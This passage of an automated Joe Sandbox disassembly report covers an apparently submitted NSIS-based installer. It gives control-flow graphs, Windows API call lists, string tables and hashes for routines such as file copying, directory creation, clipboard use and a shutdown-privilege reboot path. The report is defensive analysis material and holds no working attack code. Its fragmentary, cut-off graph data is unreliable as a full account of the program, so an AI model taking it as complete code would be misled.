18 API calls 3706->3707 3708 4021c4 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021cd 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021d6 3711->3712 3713 404f9e 25 API calls 3712->3713 3714 4021e2 ShellExecuteW 3713->3714 3715 40220d 3714->3715 3718 40221b 3714->3718 3716 4062cf 11 API calls 3715->3716 3716->3718 3717 4062cf 11 API calls 3719 402230 3717->3719 3718->3717 4930 402238 4931 40145c 18 API calls 4930->4931 4932 40223e 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 40224b 4933->4934 4935 404f9e 25 API calls 4934->4935 4936 402255 4935->4936 4937 405c6b 2 API calls 4936->4937 4938 40225b 4937->4938 4939 4062cf 11 API calls 4938->4939 4943 4022ac CloseHandle 4938->4943 4942 40226d 4939->4942 4941 4030e3 4942->4943 4944 402283 WaitForSingleObject 4942->4944 4946 40635e 2 API calls 4942->4946 4943->4941 4944->4942 4945 402291 GetExitCodeProcess 4944->4945 4945->4943 4947 4022a3 4945->4947 4946->4944 4949 405f7d wsprintfW 4947->4949 4949->4943 4950 404039 4951 404046 lstrcpynA lstrlenA 4950->4951 4952 404096 4950->4952 4951->4952 4953 404077 4951->4953 4953->4952 4954 404083 GlobalFree 4953->4954 4954->4952 4955 401eb9 4956 401f24 4955->4956 4960 401ec6 4955->4960 4958 401f53 GlobalAlloc 4956->4958 4959 401f28 4956->4959 4957 401ed5 4961 4062cf 11 API calls 4957->4961 4962 406831 18 API calls 4958->4962 4963 4062cf 11 API calls 4959->4963 4967 401f36 4959->4967 4960->4957 4964 401ef7 4960->4964 4973 401ee2 4961->4973 4966 401f46 4962->4966 4963->4967 4977 406035 lstrcpynW 4964->4977 4969 402708 4966->4969 4970 402387 GlobalFree 4966->4970 4979 406035 lstrcpynW 4967->4979 4970->4969 4971 406831 18 API calls 4971->4973 4972 401f06 4978 406035 lstrcpynW 4972->4978 4973->4969 4973->4971 4975 401f15 4980 406035 lstrcpynW 4975->4980 4977->4972 4978->4975 4979->4966 4980->4969

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 4 4052f2-4052ff 1->4 5 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->5 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 7 405320-405327 4->7 8 405301-40530a 4->8 5->4 12 405329-40532f 7->12 13 40537e-405382 7->13 10 405342-40534b call 403df6 8->10 11 40530c-40531b ShowWindow * 2 call 403dc4 8->11 21 405350-405354 10->21 11->7 18 405331-40533d call 403d44 12->18 19 405357-405367 ShowWindow 12->19 13->10 16 405384-405387 13->16 16->10 25 405389-40539c SendMessageW 16->25 18->10 23 405377-405379 call 403d44 19->23 24 405369-405372 call 404f9e 19->24 23->13 24->23 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 25->29 30 4052ba-4052bc 25->30 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->21 35->36 40 405232-405249 call 403d6b 36->40 41 405224-405230 SendMessageW 36->41 39 4053df-4053f7 TrackPopupMenu 37->39 38->39 39->30 42 4053fd-405414 39->42 47 40524b-40525f ShowWindow 40->47 48 40527f-4052a0 GetDlgItem SendMessageW 40->48 41->40 44 405419-405434 SendMessageW 42->44 44->44 46 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 44->46 51 40545b-405484 SendMessageW 46->51 49 405261-40526c ShowWindow 47->49 50 40526e 47->50 48->30 52 4052a2-4052b8 SendMessageW * 2 48->52 53 405274-40527a call 403dc4 49->53 50->53 51->51 54 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 51->54 52->30 53->48 54->30
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                              • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427179,774D23A0,00000000), ref: 00406902
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                              • ShowWindow.USER32(00000000), ref: 00405313
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                              • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                              • CreatePopupMenu.USER32 ref: 004053A2
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                              • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                              • EmptyClipboard.USER32 ref: 0040543D
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                              • CloseClipboard.USER32 ref: 0040549A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                              • String ID: New install of "%s" to "%s"${
                                                                                              • API String ID: 2110491804-1641061399
                                                                                              • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                              • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                              • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                              • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 225 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->225 226 403a5f-403a79 DeleteFileW call 4035b3 216->226 217->217 217->218 220 403984-403988 218->220 221 40397e-403983 218->221 223 4039e4-4039f1 call 405d32 220->223 224 40398a-403991 220->224 221->220 223->213 239 4039f3 223->239 228 403993-40399a 224->228 229 4039a6-4039b8 call 40382c 224->229 225->226 242 403af8-403b07 call 403885 CoUninitialize 225->242 226->242 243 403a7b-403a81 226->243 230 4039a1 228->230 231 40399c-40399f 228->231 240 4039ba-4039c1 229->240 241 4039cd-4039e2 call 40382c 229->241 230->229 231->229 231->230 239->213 245 4039c3-4039c6 240->245 246 4039c8 240->246 241->223 258 403a04-403a1c call 40824c call 406035 241->258 256 403bfa-403c00 242->256 257 403b0d-403b1d call 405ccc ExitProcess 242->257 248 403ae1-403ae8 call 405958 243->248 249 403a83-403a8c call 405d32 243->249 245->241 245->246 246->241 255 403aed-403af3 call 406113 248->255 259 403aa5-403aa7 249->259 255->242 262 403c02-403c1f call 406328 * 3 256->262 263 403c7d-403c85 256->263 258->216 267 403aa9-403ab3 259->267 268 403a8e-403aa0 call 40382c 259->268 294 403c21-403c23 262->294 295 403c69-403c74 ExitWindowsEx 262->295 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 281 403aa2 268->281 269->270 275->242 280 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->280 276->242 287 403ac7-403add call 406035 * 2 276->287 284 403b62-403b82 call 406035 * 2 280->284 285 403b57-403b5d call 406035 280->285 281->259 301 403b87-403ba3 call 406831 DeleteFileW 284->301 285->284 287->248 294->295 299 403c25-403c27 294->299 295->263 298 403c76-403c78 call 40141d 295->298 298->263 299->295 303 403c29-403c3b GetCurrentProcess 299->303 309 403be4-403bec 301->309 310 403ba5-403bb5 CopyFileW 301->310 303->295 308 403c3d-403c5f 303->308 308->295 309->301 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->242 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                              APIs
                                                                                              • #17.COMCTL32 ref: 004038CE
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                              • API String ID: 2435955865-3712954417
                                                                                              • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                              • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 809 406301-406315 FindFirstFileW 810 406322 809->810 811 406317-406320 FindClose 809->811 812 406324-406325 810->812 811->812
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID: jF
                                                                                              • API String ID: 2295610775-3349280890
                                                                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 310444273-0
                                                                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 84 4030ee-4030f2 57->84 59 401601-401611 call 4062cf 58->59 60 401742-40174f 58->60 61 401962-40197d call 40145c GetFullPathNameW 58->61 62 4019ca-4019e6 call 40145c SearchPathW 58->62 63 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->63 64 401650-40166d call 40137e call 4062cf call 40139d 58->64 65 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->65 66 401672-401686 call 40145c call 4062cf 58->66 67 401693-4016ac call 401446 call 4062cf 58->67 68 401715-401731 58->68 69 401616-40162d call 40145c call 4062cf call 404f9e 58->69 70 4016d6-4016db 58->70 71 401736-40173d 58->71 72 401897-4018a7 call 40145c call 406301 58->72 73 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->73 74 40163c-401645 58->74 75 4016bd-4016d1 call 4062cf SetForegroundWindow 58->75 59->84 88 401751-401755 ShowWindow 60->88 89 401758-40175f 60->89 120 4019a3-4019a8 61->120 121 40197f-401984 61->121 62->57 114 4019ec-4019f8 62->114 63->57 141 40179a-4017a6 call 4062cf 63->141 64->84 161 401864-40186c 65->161 162 4017de-4017fc call 405d32 CreateDirectoryW 65->162 142 401689-40168e call 404f9e 66->142 135 4016b1-4016b8 Sleep 67->135 136 4016ae-4016b0 67->136 68->84 85 401632-401637 69->85 82 401702-401710 70->82 83 4016dd-4016fd call 401446 70->83 87 4030dd-4030de 71->87 143 4018c2-4018d6 call 4062cf 72->143 144 4018a9-4018bd call 4062cf 72->144 171 401912-401919 73->171 172 40191e-401921 73->172 74->85 86 401647-40164e PostQuitMessage 74->86 75->57 82->57 83->57 85->84 86->85 87->57 123 4030de call 405f7d 87->123 88->89 89->57 104 401765-401769 ShowWindow 89->104 104->57 114->57 114->87 125 4019af-4019b2 120->125 121->125 132 401986-401989 121->132 123->57 125->57 137 4019b8-4019c5 GetShortPathNameW 125->137 132->125 145 40198b-401993 call 406301 132->145 135->57 136->135 137->57 156 4017ab-4017ac 141->156 142->57 143->84 144->84 145->120 168 401995-4019a1 call 406035 145->168 156->57 166 401890-401892 161->166 167 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 161->167 175 401846-40184e call 4062cf 162->175 176 4017fe-401809 GetLastError 162->176 166->142 167->57 168->125 171->142 177 401923-40192b call 406301 172->177 178 40194a-401950 172->178 189 401853-401854 175->189 180 401827-401832 GetFileAttributesW 176->180 181 40180b-401825 GetLastError call 4062cf 176->181 177->178 195 40192d-401948 call 406c94 call 404f9e 177->195 185 401957-40195d call 4062cf 178->185 187 401834-401844 call 4062cf 180->187 188 401855-40185e 180->188 181->188 185->156 187->189 188->161 188->162 189->188 195->185
                                                                                              APIs
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                              Strings
                                                                                              • Call: %d, xrefs: 0040165A
                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                              • Jump: %d, xrefs: 00401602
                                                                                              • BringToFront, xrefs: 004016BD
                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                              • API String ID: 2872004960-3619442763
                                                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 329 4054d4-4054e1 SetWindowPos 326->329 330 4054e7-4054ea 326->330 332 4056ac-4056b1 call 403ddb 327->332 333 40566e-405671 327->333 328->327 329->330 335 405504-40550a 330->335 336 4054ec-4054fe ShowWindow 330->336 342 4056b6-4056d1 332->342 338 405673-40567e call 40139d 333->338 339 4056a4-4056a6 333->339 343 405526-405529 335->343 344 40550c-405521 DestroyWindow 335->344 336->335 338->339 354 405680-40569f SendMessageW 338->354 339->332 341 40594c 339->341 349 40594e-405955 341->349 347 4056d3-4056d5 call 40141d 342->347 348 4056da-4056e0 342->348 352 40552b-405537 SetWindowLongW 343->352 353 40553c-405542 343->353 350 405929-40592f 344->350 347->348 357 4056e6-4056f1 348->357 358 40590a-405923 DestroyWindow KiUserCallbackDispatcher 348->358 350->341 355 405931-405937 350->355 352->349 359 4055e5-4055f4 call 403df6 353->359 360 405548-405559 GetDlgItem 353->360 354->349 355->341 364 405939-405942 ShowWindow 355->364 357->358 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 357->365 358->350 359->349 361 405578-40557b 360->361 362 40555b-405572 SendMessageW IsWindowEnabled 360->362 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 